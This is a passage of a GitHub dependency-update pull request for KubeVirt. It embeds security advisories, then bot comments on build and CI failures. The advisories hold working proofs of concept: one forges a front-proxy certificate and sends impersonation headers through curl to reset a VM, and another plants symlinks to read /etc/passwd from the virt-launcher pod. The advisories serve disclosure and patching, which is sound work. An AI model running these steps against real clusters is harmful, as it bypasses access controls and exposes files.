	"/apis/subresources.kubevirt.io/v1alpha3/dump-cluster-profiler":  {},
}

Each endpoint which is not in this list is considered an authenticated endpoint and requires a valid client certificate to be presented by the caller.

##### trying to reach an API endpoint not in the above list would require client authentication
attacker@compromised-pod:~$ curl -ks https://10.244.0.6:8443/v1
request is not authenticated

To illustrate the vulnerability and attack scenario, below is generated a certificate signed by the front-proxy-ca but issued to an entity which is different than front-proxy-client (i.e the certificate has a different CN). Later on, it is assumed that the attacker has obtained access to the certificate bundle:

attacker@compromised-pod:~$ openssl ecparam -genkey -name prime256v1 -noout -out rogue-front-proxy.key
attacker@compromised-pod:~$ openssl req -new -key rogue-front-proxy.key -out rogue-front-proxy.csr -subj "/CN=crypt0n1t3/O=Quarkslab/C=Fr"
attacker@compromised-pod:~$ openssl x509 -req -in rogue-front-proxy.csr -CA front-proxy-ca.crt -CAkey front-proxy-ca.key -CAcreateserial -out
 rogue-front-proxy.crt -days 365

The authentication will now succeed:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key  https://10.244.0.6:8443/v1
a valid user header is required for authorization

To fully exploit the vulnerability, the attacker must also provide valid authentication HTTP headers:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key  -H 'X-Remote-User:system:kube-aggregator' -H '
X-Remote-Group: system:masters' https://10.244.0.6:8443/v1
unknown api endpoint: /subresource.kubevirt.io/v1

The virt-api is a sub-resource extension server - it handles only requests for specific resources and sub-resources (requests having URIs prefixed with /apis/subresources.kubevirt.io/v1/). In reality, most of the requests that it accepts are actually executed by the virt-handler component and are related to the lifecycle of a VM.

Hence, virt-handler's API can be seen as aggregated within virt-api's API which in turn transforms it into a proxy.

The endpoints which are handled by virt-api are listed in the Swagger definitions available on GitHub @​openapi-spec.

Resetting a Virtual Machine Instance

Consider the following deployed VirtualMachineInstance (VMI) within the default namespace:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  namespace: default
  name: mishandling-common-name-in-certificate-default
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

An attacker with a stolen external authentication proxy certificate could easily reset (hard reboot), freeze, or remove volumes from the virtual machine.

root@compromised-pod:~$ curl -ki --cert rogue-front-proxy.crt --key rogue-front-proxy.key  -H 'X-Remote-User: system:kube-aggregator' -H 'X-Remote-Group: system:masters' https://10.244.0.6:8443/apis/subresources.kubevirt.io/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-default/reset -XPUT

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 16:43:26 GMT
Content-Length: 0
Impact

What kind of vulnerability is it? Who is impacted?

The virt-api component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt

CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109

More information

Details

KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Arbitrary Container File Read

CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109

More information

Details

Summary

_Short summary of the problem. Make the impact and severity as clear as possible.

Mounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the virt-launcher pod. This is due to erroneous handling of symlinks defined within a PVC.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

A vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod's file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod's file system. Since libvirt can treat regular files as block devices, any file on the pod's file system that is symlinked in this way can be mounted into the VM and subsequently read.

Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (TODO: put link here). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod's file system or on a mounted PVC from within the guest VM.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Consider that an attacker has control over the contents of two PVC (e.g., from within a container) and creates the following symlinks:

##### The YAML definition of two PVCs that the attacker has access to
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-1
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-2
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---

##### The attacker-controlled container used to create the symlinks in the above PVCs
apiVersion: v1
kind: Pod
metadata:
  name: dual-pvc-pod
spec:
  containers:
  - name: app-container
    image: alpine
    command: ["/some-vulnerable-app"]
    volumeMounts:
    - name: pvc-volume-one
      mountPath: /mnt/data1
    - name: pvc-volume-two
      mountPath: /mnt/data2
  volumes:
  - name: pvc-volume-one
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-1
  - name: pvc-volume-two
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-2

By default, Minikube's storage controller (hostpath-provisioner) will allocate the claim as a directory on the host node (HostPath). Once the above Kubernetes resources are created, the user can create the symlinks within the PVC as follows:

##### Using the `pvc-arbitrary-container-read-1` PVC we want to read the default XML configuration generated by `virt-launcher` for `libvirt`. Hence, the attacker has to create a symlink including the name of the future VM which will be created using this configuration.

attacker@dual-pvc-pod:/mnt/data1 $ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img
attacker@dual-pvc-pod:/mnt/data1 $ls -l
lrwxrwxrwx    1 root     root            85 May 19 22:24 disk.img -> ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml

##### With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM
attacker@dual-pvc-pod:/mnt/data2 $ln -s ../../../../../../../../etc/passwd disk.img 
attacker@dual-pvc-pod:/mnt/data2 $ls -l
lrwxrwxrwx    1 root     root            34 May 19 22:26 disk.img -> ../../../../../../../../etc/passwd

Of course, these links could potentially be broken as the files, especially default_arbitrary-container-read.xml, could not exist on the dual-pvc-pod pod's file system. The attacker then deploy the following VM:

##### arbitrary-container-read.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-container-read
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-container-read
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: pvc-1
              disk:
                bus: virtio
            - name: pvc-2
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: pvc-1
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-1
        - name: pvc-2
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-2
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The two PVCs will be mounted as volumes in "filesystem" mode:

From the documentation of the different volume modes, one can infer that if the backing disk.img is not owned by the unprivileged user with UID 107, the VM should fail to mount it. In addition, it's expected that this backing file is in RAW format. While this format can contain pretty much anything, we consider that being able to mount a file from the file system of virt-launcher is not the expected behaviour. Below is demonstrated that after applying the VM manifest, the guest can read the /etc/passwd and default_migration.xml files from the virt-launcher pod's file system:

##### Deploy the VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml
virtualmachine.kubevirt.io/arbitrary-container-read created

##### Observe the deployment status
operator@minikube:~$ kubectl get vmis
NAME                       AGE   PHASE     IP           NODENAME       READY
arbitrary-container-read   80s   Running   10.244.1.9   minikube-m02   True

##### Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-container-read
##### Within the `arbitrary-container-read` VM, inspect the available block devices
root@arbitrary-container-read:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
-vda15 253:15   0    8M  0 part
vdb     253:16   0   20K  0 disk
vdc     253:32   0  512B  0 disk
vdd     253:48   0    1M  0 disk

##### Inspect the mounted /etc/passwd of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdc
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash

##### Inspect the mounted `default_migration.xml` of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdb | head -n 20
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit default_arbitrary-container-read
or other application using the libvirt API.
-->
<domstatus state='paused' reason='starting up' pid='80'>
  <monitor path='/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock' type='unix'/>
  <vcpus>
  </vcpus>
  <qemuCaps>
    <flag name='hda-duplex'/>
    <flag name='piix3-usb-uhci'/>
    <flag name='piix4-usb-uhci'/>
    <flag name='usb-ehci'/>
    <flag name='ich9-usb-ehci1'/>
    <flag name='usb-redir'/>
    <flag name='usb-hub'/>
    <flag name='ich9-ahci'/>
operator@minikube:~$ kubectl get pods
NAME                                           READY   STATUS    RESTARTS   AGE
dual-pvc-pod                                   1/1     Running   0          20m
virt-launcher-arbitrary-container-read-tn4mb   3/3     Running   0          15m

##### Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash 

##### Inspect the ownership of the `/etc/passwd` file of the ` virt-launcher` pod 
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd
-rw-r--r--. 1 qemu qemu 73 Jan  1  1970 /etc/passwd
Impact

What kind of vulnerability is it? Who is impacted?

This vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Vulnerable to Arbitrary Host File Read and Write

CVE-2025-64324 / GHSA-46xp-26xh-hpqh / GO-2025-4110

More information

Details

Summary

The hostDisk feature in KubeVirt allows mounting a host file or directory owned b

@redhat-renovate-bot redhat-renovate-bot added the release-note-none Denotes a PR that doesn't merit a release note. label Apr 20, 2026
@redhat-renovate-bot
Copy link
Copy Markdown
Collaborator Author

redhat-renovate-bot commented Apr 20, 2026

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: go.sum
Command failed: go get -t ./...
go: downloading cel.dev/expr v0.24.0
go: downloading google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb
go: downloading google.golang.org/grpc v1.72.1
go: downloading github.com/go-jose/go-jose/v4 v4.0.5
go: downloading github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.3
go: downloading google.golang.org/genproto/googleapis/rpc v0.0.0-20250303144028-a0af3efb3deb
go: k8s.io/api@v0.36.0 requires go >= 1.26.0 (running go 1.25.8)
go: k8s.io/api@v0.36.0 requires go >= 1.26.0 (running go 1.25.8)

@kubevirt-bot kubevirt-bot added the dco-signoff: yes Indicates the PR's author has DCO signed all their commits. label Apr 20, 2026
@openshift-ci openshift-ci Bot requested review from 0xFelix and ksimon1 April 20, 2026 16:28
@openshift-ci
Copy link
Copy Markdown

openshift-ci Bot commented Apr 20, 2026

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: redhat-renovate-bot
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Details Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@kubevirt-bot
Copy link
Copy Markdown
Contributor

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Details Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@kubevirt-bot kubevirt-bot requested a review from akrejcir April 20, 2026 16:28
@redhat-renovate-bot redhat-renovate-bot changed the title chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) - autoclosed Apr 25, 2026
@redhat-renovate-bot redhat-renovate-bot deleted the renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability branch April 25, 2026 16:06
Signed-off-by: null <redhat-internal-renovate@redhat.com>
@redhat-renovate-bot redhat-renovate-bot changed the title chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) - autoclosed chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) Apr 25, 2026
@redhat-renovate-bot redhat-renovate-bot force-pushed the renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability branch 2 times, most recently from cd94a0c to 8918e6b Compare April 25, 2026 20:36
@openshift-ci
Copy link
Copy Markdown

openshift-ci Bot commented Apr 25, 2026

@redhat-renovate-bot: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name Commit Details Required Rerun command
ci/prow/images 8918e6b link true /test images
ci/prow/e2e-tests 8918e6b link true /test e2e-tests

Full PR test history. Your PR dashboard.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dco-signoff: yes Indicates the PR's author has DCO signed all their commits. release-note-none Denotes a PR that doesn't merit a release note. size/XS

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants